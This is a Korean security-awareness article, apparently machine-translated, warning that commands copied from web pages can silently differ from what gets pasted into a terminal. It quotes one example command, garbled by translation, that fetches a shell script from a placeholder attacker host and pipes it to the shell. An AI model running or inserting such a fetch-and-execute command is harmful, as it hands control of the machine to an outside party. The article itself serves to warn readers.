- 우리 모두는 실제로 위험을 모른 채 매일 인터넷에서 복사하여 붙여넣습니다.
- 보안 전문가는 이 작업을 수행할 때 최악의 시나리오를 모두에게 보여주기 위해 시간을 들였습니다.
- 인터넷에서 얻은 명령을 터미널에 붙여넣는 것은 해킹을 당하는 빠른 방법입니다
- 터미널에 붙여넣는다고 생각했던 명령이 실제로는 악성 코드입니다.
속도가 모든 것이고 빠른 결과를 얻는 것이 중요한 시대에 살고 있는 것이 사실입니다. 그러나 실제로 잠시 멈추고 그 결과에 대해 생각하는 사람은 거의 없습니다.
매일 수백만 명의 프로그래머, 관리자 및 보안 연구원이 웹 페이지의 명령을 복사하여 PC의 콘솔에 직접 붙여넣는 것과 같은 간단한 작업을 수행하고 있습니다.
많은 사람들이 이에 대해 다시 생각조차 하지 않지만, 특히 중요하거나 중요한 데이터를 저장하는 경우 처음에 생각하는 것보다 그 영향이 더 크고 위험합니다.
잘 알려진 보안 전문가가 시간을 내어 공유했습니다. 실제로 일어날 수 있는 일 웹 페이지에서 콘텐츠를 복사하여 붙여넣는 경우.
복사+붙여넣기는 실제로 해킹당하는 쉬운 방법입니다.
보안 인식 교육 플랫폼인 Wizer의 설립자인 Gabriel Friedlander는 웹 페이지에서 명령을 복사하여 붙여넣기 전에 한 번 더 생각하게 만드는 계획을 도외시했습니다.
오늘날 인터넷에서 콘텐츠를 복사하여 붙여넣는 일이 너무 보편화되어 아무도 그것에 대해 생각조차 하지 않습니다.
그러나 Friedlander는 일부 웹 페이지는 처음 인식할 수 있는 것보다 더 기만적이며 이 페이지에서 복사했다고 생각하는 내용이 실제로 수행한 내용과 매우 다르다고 경고합니다.
그리고 이 모든 것의 더 나쁜 점은 필요한 지식이나 안내 없이 피해자가 텍스트를 붙여 넣은 후에야 자신의 실수를 깨닫는다는 것입니다. 이때는 이미 너무 늦을 수 있습니다.
보안 분석가는 또한 자신의 블로그 독자를 위한 약간의 테스트를 고안했습니다. 사람들이 실제로 여러분이 의도하지 않게 사이버 범죄자에게 문을 여는 것이 얼마나 쉬운지 이해할 수 있도록 하기 위해서입니다.
그는 복사하기 위한 명령을 제공했지만 텍스트를 붙여넣고 설정에서 실제로 도입한 내용을 볼 때만 관련된 진실이 밝혀집니다.
위의 스크린샷에 표시된 명령을 복사한 후 붙여넣은 결과는 복제한다고 생각했던 것과는 거리가 멀기 때문에 충격을 받을 것입니다.
곱슬 곱슬하다 http://attacker-domain: 8000/shell.sh | 쉿
클립보드에 있는 완전히 다른 명령 외에도 그것의 끝은 위의 예제가 Linux에 직접 붙여넣는 즉시 실행됨을 의미합니다. 단말기.
따라서 실제로 어떤 일이 발생하는지 더 잘 알고 이를 심각한 안전 위험으로 처리해야 합니다. 모든 웹사이트가 악성 콘텐츠를 숨기는 것은 아니지만 이를 고려하는 것이 좋습니다.
터미널에 이상한 명령을 붙여넣어 해킹을 당한 적이 있습니까? 아래 의견 섹션에서 경험을 공유하십시오.